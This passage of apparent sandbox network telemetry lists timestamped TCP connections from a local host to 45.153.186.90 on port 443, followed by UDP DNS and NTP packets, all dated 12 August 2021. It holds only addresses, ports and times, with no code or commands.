Aug 12, 2021 07:47:00.858589888 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.864754915 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:01.020179987 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:01.030023098 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:01.436716080 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:01.436775923 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.460599899 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.462658882 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.586055040 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:03.596951962 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.600991011 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.610035896 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:03.610133886 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.730232000 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:03.847914934 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:03.848098040 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.849014044 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.852648020 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:03.973910093 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:03.980411053 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:04.256001949 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:04.262423038 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.267311096 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.270621061 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.320365906 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:06.320591927 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.321765900 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.344074011 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:06.344266891 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.393759966 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:06.735378027 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:06.735779047 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.736527920 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.742048025 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:06.819231033 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:06.819283962 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:07.107347965 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:07.107474089 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.122888088 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.125869036 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.236315012 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.236594915 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.238914013 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.249372005 CEST	443	49750	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.249591112 CEST	49750	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.362227917 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.489101887 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.489706039 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.490616083 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.498186111 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:09.672184944 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.695205927 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.984220982 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:09.984425068 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:11.998605013 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.000418901 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.081218004 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.081347942 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.082031965 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.083355904 CEST	443	49751	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.083503962 CEST	49751	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.182440996 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.207093954 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.207616091 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.208365917 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.213691950 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:12.341382027 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.797552109 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:12.797890902 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.810578108 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.812809944 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.852293015 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:14.852423906 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.853209972 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.864784956 CEST	443	49752	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:14.864898920 CEST	49752	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:14.942800999 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:15.074234009 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:15.075400114 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:15.075423956 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:15.079081059 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:15.252418995 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:15.256951094 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:15.745373964 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:15.745553970 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.756525040 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.757769108 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.807410955 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:17.807533979 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.808144093 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.838357925 CEST	443	49753	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:17.839196920 CEST	49753	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.880949974 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:17.925203085 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:17.926043987 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.926565886 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:17.930071115 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:18.034693956 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:18.039876938 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:18.592150927 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:18.592473030 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.596987009 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.598887920 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.642157078 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:20.642374039 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.644784927 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.666331053 CEST	443	49754	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:20.666486025 CEST	49754	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:20.716329098 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:21.060694933 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:21.060832977 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:21.062536001 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:21.066149950 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:21.221738100 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:21.221934080 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:21.557574034 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:21.557717085 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.567187071 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.570162058 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.669564962 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:23.673109055 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.678385973 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.682626009 CEST	443	49756	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:23.682703018 CEST	49756	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.801899910 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:23.802124977 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:23.802293062 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.803106070 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.812340021 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:23.964212894 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:24.339329004 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:24.339438915 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.348747969 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.350641966 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.453102112 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:26.453144073 CEST	443	49758	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:26.453331947 CEST	49758	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.454822063 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.454997063 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.591202021 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:26.606220961 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:26.606508017 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.607613087 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.617634058 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:26.823955059 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:27.174793959 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:27.174932957 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.192719936 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.195756912 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.314944029 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:29.315136909 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.316344023 CEST	443	49759	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:29.316401005 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.316478968 CEST	49759	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.434900999 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:29.434952021 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:29.435216904 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.435961008 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.445300102 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:29.605259895 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:30.052407026 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:30.053819895 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.066380978 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.067677975 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.235187054 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:32.235505104 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.237515926 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.237982035 CEST	443	49760	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:32.238194942 CEST	49760	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.416862965 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:32.418956995 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:32.419246912 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.420317888 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.428689957 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:32.658624887 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:33.137411118 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:33.137551069 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.144635916 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.145950079 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.319047928 CEST	443	49761	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.319283009 CEST	49761	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.319947958 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.320125103 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.321475983 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.509226084 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.551233053 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.551496983 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.552294970 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.561189890 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:35.628290892 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.641499996 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.867276907 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:35.867455959 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.029268026 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.030642986 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.166166067 CEST	443	49762	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.166333914 CEST	49762	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.168250084 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.168431997 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.169857979 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.323678017 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.352591038 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.352952957 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.353667021 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.362658978 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:38.511817932 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.773286104 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:38.773550987 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.645104885 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.648166895 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.750694990 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:41.751913071 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.751988888 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.761534929 CEST	443	49763	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:41.761715889 CEST	49763	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:41.859724998 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:42.044933081 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:42.045923948 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:42.046792030 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:42.052103043 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:42.215818882 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:42.230273962 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:42.544312954 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:42.544483900 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:50.238486052 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:50.238517046 CEST	49764	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:50.353538036 CEST	443	49764	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:50.353677034 CEST	443	49765	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:50.353785992 CEST	49765	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:50.353789091 CEST	49764	443	192.168.2.3	45.153.186.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2021 07:45:30.055372000 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:30.112828016 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:30.891688108 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:30.927787066 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:31.357717991 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:31.393549919 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:31.704391956 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:31.729470015 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:32.439388990 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:32.473680019 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:33.159939051 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:33.196650028 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:33.963561058 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:33.988997936 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:34.813883066 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:34.848160982 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:35.678086042 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:35.709428072 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:36.941050053 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:36.969491005 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:39.895179033 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:39.920698881 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:40.904484987 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:40.931623936 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:41.880862951 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:41.916548967 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:42.612946987 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:42.646473885 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:43.357795000 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:43.382867098 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:44.049175024 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:44.082120895 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:44.730047941 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:44.757020950 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:45.642909050 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:45.668046951 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:47.742536068 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:47.807796955 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:47.920039892 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:47.985032082 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:47.986516953 CEST	50541	123	192.168.2.3	194.58.200.20
Aug 12, 2021 07:45:48.026993990 CEST	123	50541	194.58.200.20	192.168.2.3
Aug 12, 2021 07:45:48.030041933 CEST	54366	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:45:49.033164978 CEST	54366	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:45:49.796711922 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:49.824991941 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 12, 2021 07:45:50.048294067 CEST	54366	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:45:52.095144987 CEST	54366	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:45:56.143043995 CEST	54366	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:45:56.149277925 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:45:56.197129965 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:00.452193975 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:00.519720078 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:00.520998955 CEST	55436	123	192.168.2.3	194.58.200.20
Aug 12, 2021 07:46:00.561947107 CEST	123	55436	194.58.200.20	192.168.2.3
Aug 12, 2021 07:46:00.565773964 CEST	50713	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:01.581136942 CEST	50713	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:02.455152988 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:02.492249012 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:02.643002987 CEST	50713	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:04.642723083 CEST	50713	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:06.110284090 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:06.135565996 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:08.699170113 CEST	50713	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:12.772212029 CEST	56579	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:14.277606010 CEST	56579	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:15.284924984 CEST	56579	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:17.331928968 CEST	56579	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:21.340348959 CEST	56579	53	192.168.2.3	185.243.215.214
Aug 12, 2021 07:46:24.202919006 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:24.239217043 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:24.802167892 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:24.851939917 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:26.488425016 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:26.584278107 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:26.585289955 CEST	63620	123	192.168.2.3	194.58.200.20
Aug 12, 2021 07:46:26.629555941 CEST	123	63620	194.58.200.20	192.168.2.3
Aug 12, 2021 07:46:26.631669044 CEST	64938	53	192.168.2.3	1.2.4.8
Aug 12, 2021 07:46:26.835854053 CEST	53	64938	1.2.4.8	192.168.2.3
Aug 12, 2021 07:46:26.838856936 CEST	61946	53	192.168.2.3	1.2.4.8
Aug 12, 2021 07:46:27.099960089 CEST	53	61946	1.2.4.8	192.168.2.3
Aug 12, 2021 07:46:28.235521078 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:28.286125898 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:28.301562071 CEST	64911	123	192.168.2.3	194.58.200.20
Aug 12, 2021 07:46:28.343308926 CEST	123	64911	194.58.200.20	192.168.2.3
Aug 12, 2021 07:46:28.346050978 CEST	52123	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:29.394819021 CEST	52123	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:30.442883015 CEST	52123	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:32.513928890 CEST	52123	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:36.505673885 CEST	52123	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:40.361924887 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:40.411782980 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:40.541099072 CEST	56338	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:41.583662033 CEST	56338	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:42.646384001 CEST	56338	53	192.168.2.3	114.114.114.114
Aug 12, 2021 07:46:42.774602890 CEST	53	56338	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:43.503618002 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:43.537899971 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:44.412622929 CEST	53	52123	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:44.833942890 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:44.936559916 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:45.594227076 CEST	53	52123	114.114.114.114	192.168.2.3
